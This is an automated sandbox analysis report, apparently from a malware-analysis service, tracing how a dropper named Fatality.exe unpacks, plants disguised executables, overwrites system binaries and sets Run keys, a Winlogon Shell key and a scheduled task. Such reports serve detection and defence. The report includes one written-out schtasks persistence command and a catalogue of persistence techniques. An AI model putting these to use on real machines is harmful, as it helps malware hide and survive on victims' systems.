                              Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: mscoree.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: kernel.appcore.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: version.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: uxtheme.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: windows.storage.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: wldp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: profapi.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: cryptsp.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: rsaenh.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: cryptbase.dll
                              Source: C:\Recovery\dllhost.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\Desktop\Fatality.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                              Source: C:\Bridgemonitor\BridgeInto.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exeJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeDirectory created: C:\Program Files\Microsoft Office 15\ClientX64\c917822ecb0d66Jump to behavior
                              Source: Fatality.exeStatic file information: File size 3517117 > 1048576
                              Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Fatality.exe, Fatality.exe, 00000000.00000002.2133149827.0000000000891000.00000040.00000001.01000000.00000003.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: :C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.pdb source: BridgeInto.exe, 00000006.00000002.2336699470.000000000373F000.00000004.00000800.00020000.00000000.sdmp

                              Data Obfuscation

                              barindex
                              Detected unpacking (changes PE section rights)
                              Source: C:\Users\user\Desktop\Fatality.exeUnpacked PE file: 0.2.Fatality.exe.890000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;Unknown_Section5:EW;.rsrc:EW;Unknown_Section7:EW;cheat:EW; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:W;Unknown_Section4:R;Unknown_Section5:R;.rsrc:EW;Unknown_Section7:EW;cheat:EW;
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5qzorvzb\5qzorvzb.cmdline"Jump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2csyxc1q\2csyxc1q.cmdline"Jump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeFile created: C:\Bridgemonitor\__tmp_rar_sfx_access_check_4558562Jump to behavior
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name:
                              Source: Fatality.exeStatic PE information: section name: cheat
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009A219C push ecx; mov dword ptr [esp], edx0_2_009A219E
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099E104 push ecx; mov dword ptr [esp], edx0_2_0099E109
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099228C push 009926D8h; ret 0_2_009926D0
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0098A3EA push 0098A418h; ret 0_2_0098A410
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099E32C push ecx; mov dword ptr [esp], edx0_2_0099E331
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0098A494 push 0098A4C0h; ret 0_2_0098A4B8
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099E48C push ecx; mov dword ptr [esp], edx0_2_0099E491
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0098A4F8 push 0098A52Ch; ret 0_2_0098A524
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009A840C push ecx; mov dword ptr [esp], edx0_2_009A8411
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0098A424 push 0098A450h; ret 0_2_0098A448
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0098A45C push 0098A488h; ret 0_2_0098A480
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099C454 push 0099C4A1h; ret 0_2_0099C499
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099E448 push ecx; mov dword ptr [esp], edx0_2_0099E44D
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009885F0 push 00988641h; ret 0_2_00988639
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099A536 push 0099A5B5h; ret 0_2_0099A5AD
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009A054C push ecx; mov dword ptr [esp], edx0_2_009A054D
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009926DA push 0099274Bh; ret 0_2_00992743
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009888AA push 009888D8h; ret 0_2_009888D0
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099A804 push 0099A830h; ret 0_2_0099A828
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099285E push 0099288Ch; ret 0_2_00992884
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_00988968 push 00988994h; ret 0_2_0098898C
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099CB08 push esp; retf 0_2_0099CB09
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099CB28 push esp; retf 0_2_0099CB29
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_00984F90 push eax; ret 0_2_00984FCC
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009A0F70 push ecx; mov dword ptr [esp], ecx0_2_009A0F75
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099B3A0 push 0099B400h; ret 0_2_0099B3F8
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099B524 push 0099B5A4h; ret 0_2_0099B59C
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099B684 push ecx; mov dword ptr [esp], ecx0_2_0099B687
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_009996A4 push 0099974Ch; ret 0_2_00999744
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_0099962C push 009996A2h; ret 0_2_0099969A
                              Source: C:\Users\user\Desktop\Fatality.exeCode function: 0_2_00999760 push 0099979Ch; ret 0_2_00999794
                              Source: Fatality.exeStatic PE information: section name: entropy: 7.996936789356691
                              Source: Fatality.exeStatic PE information: section name: entropy: 7.977874239971029
                              Source: Fatality.exeStatic PE information: section name: entropy: 7.478628519160346
                              Source: Fatality.exeStatic PE information: section name: entropy: 7.946335906125016
                              Source: Fatality.exeStatic PE information: section name: entropy: 7.85259808088101
                              Source: Fatality.exeStatic PE information: section name: cheat entropy: 7.985166472762615
                              Source: BridgeInto.exe.0.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: WinStore.App.exe.6.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: dllhost.exe.6.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: EoNanmDGxPEtougVgAjHLx.exe.6.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: EoNanmDGxPEtougVgAjHLx.exe0.6.drStatic PE information: section name: .text entropy: 7.553608083833407
                              Source: EoNanmDGxPEtougVgAjHLx.exe1.6.drStatic PE information: section name: .text entropy: 7.553608083833407

                              Persistence and Installation Behavior

                              barindex
                              Creates processes via WMI
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Source: C:\Bridgemonitor\BridgeInto.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Program Files\Microsoft Office 15\ClientX64\EoNanmDGxPEtougVgAjHLx.exeJump to dropped file
                              Source: C:\Users\user\Desktop\Fatality.exeFile created: C:\Bridgemonitor\BridgeInto.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Recovery\dllhost.exeJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\AqqubUji.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\EoNanmDGxPEtougVgAjHLx.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\UXzikyum.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\rfcELAFu.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\pMLeDcaM.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\LfISQjWH.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\MMFizuKP.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\EiwsPBui.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\XAjYjGFx.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\nKZvhtVR.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\vVSvSxGn.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\ProgramData\ssh\WinStore.App.exeJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\ProgramData\ssh\WinStore.App.exeJump to dropped file
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\XAjYjGFx.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\MMFizuKP.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\EiwsPBui.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\nKZvhtVR.logJump to dropped file
                              Source: C:\Bridgemonitor\BridgeInto.exeFile created: C:\Users\user\Desktop\pMLeDcaM.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\vVSvSxGn.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\rfcELAFu.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\UXzikyum.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\AqqubUji.logJump to dropped file
                              Source: C:\Recovery\EoNanmDGxPEtougVgAjHLx.exeFile created: C:\Users\user\Desktop\LfISQjWH.logJump to dropped file

                              Boot Survival

                              barindex
                              Creates an undocumented autostart registry key
                              Source: C:\Bridgemonitor\BridgeInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ShellJump to behavior
                              Creates multiple autostart registry keys
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgeIntoJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                              Uses schtasks.exe or at.exe to add and modify task schedules
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "EoNanmDGxPEtougVgAjHLxE" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\microsoft.net\RedistList\EoNanmDGxPEtougVgAjHLx.exe'" /f
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run dllhostJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WinStore.AppJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgeIntoJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run BridgeIntoJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run EoNanmDGxPEtougVgAjHLxJump to behavior
                              Source: C:\Users\user\Desktop\Fatality.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Bridgemonitor\BridgeInto.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\System32\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
